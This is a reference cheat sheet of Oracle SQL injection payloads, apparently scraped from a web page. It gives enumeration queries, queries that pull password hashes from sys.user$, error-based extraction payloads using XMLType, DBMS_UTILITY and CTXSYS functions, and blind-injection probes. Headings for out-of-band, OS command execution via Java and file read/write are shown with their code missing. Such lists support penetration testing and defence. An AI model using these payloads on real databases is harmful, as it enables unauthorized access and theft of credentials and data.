Oraclesql Injection
Oracle SQL Injection is a type of security vulnerability that arises when attackers can insert or "inject" malicious SQL code into SQL queries executed by Oracle Database. This can occur when user inputs are not properly sanitized or parameterized, allowing attackers to manipulate the query logic. This can lead to unauthorized access, data manipulation, and other severe security implications.
Summary
Oracle SQL Default Databases
SYSTEM
Available in all versions
SYSAUX
Available in all versions
Oracle SQL Comments
Single-Line Comment
--
Multi-Line Comment
/**/
Oracle SQL Enumeration
DBMS version
SELECT user FROM dual UNION SELECT * FROM v$version
DBMS version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
DBMS version
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
DBMS version
SELECT BANNER FROM gv$version WHERE ROWNUM = 1;
DBMS version
SELECT version FROM v$instance;
Hostname
SELECT UTL_INADDR.get_host_name FROM dual;
Hostname
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
Hostname
SELECT UTL_INADDR.get_host_address FROM dual;
Hostname
SELECT host_name FROM v$instance;
Database name
SELECT global_name FROM global_name;
Database name
SELECT name FROM V$DATABASE;
Database name
SELECT instance_name FROM V$INSTANCE;
Database name
SELECT SYS.DATABASE_NAME FROM DUAL;
Database name
SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM dual;
Oracle SQL Database Credentials
SELECT username FROM all_users;
Available on all versions
SELECT name, password from sys.user$;
Privileged, <= 10g
SELECT name, spare4 from sys.user$;
Privileged, <= 11g
Oracle SQL Methodology
Oracle SQL List Databases
Oracle SQL List Tables
Oracle SQL List Columns
Oracle SQL Error Based
Invalid HTTP Request
SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual
CTXSYS.DRITHSX.SN
SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual
Invalid XPath
SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual
Invalid XML
SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual
Invalid XML
SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users
SQL Error
SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))
XDBURITYPE getblob
XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()
XDBURITYPE getclob
XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()
XMLType
AND 1337=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'~'||(REPLACE(REPLACE(REPLACE(REPLACE((SELECT banner FROM v$version),' ','_'),'$','(DOLLAR)'),'@','(AT)'),'#','(HASH)'))||'~'||CHR(62))) FROM DUAL) -- -
DBMS_UTILITY
AND 1337=DBMS_UTILITY.SQLID_TO_SQLHASH('~'||(SELECT banner FROM v$version)||'~') -- -
When the injection point is inside a string use : '||PAYLOAD--
Oracle SQL Blind
Version is 12.2
SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';
Subselect is enabled
SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)
Table log_table exists
SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table);
Column message exists in table log_table
SELECT COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';
First letter of first message is t
SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';
Oracle Blind With Substring Equivalent
SUBSTR
SUBSTR('foobar', <START>, <LENGTH>)
Oracle SQL Time Based
Oracle SQL Out of Band
Oracle SQL Command Execution
quentinhardy/odat - ODAT (Oracle Database Attacking Tool)
Oracle Java Execution
List Java privileges
Grant privileges
Execute commands
10g R2, 11g R1 and R2:
DBMS_JAVA_TEST.FUNCALL()11g R1 and R2:
DBMS_JAVA.RUNJAVA()
Oracle Java Class
Create Java class
Run OS command
Package os_command
DBMS_SCHEDULER Jobs
OracleSQL File Manipulation
⚠️ Only in a stacked query.
OracleSQL Read File
OracleSQL Write File
References
Last updated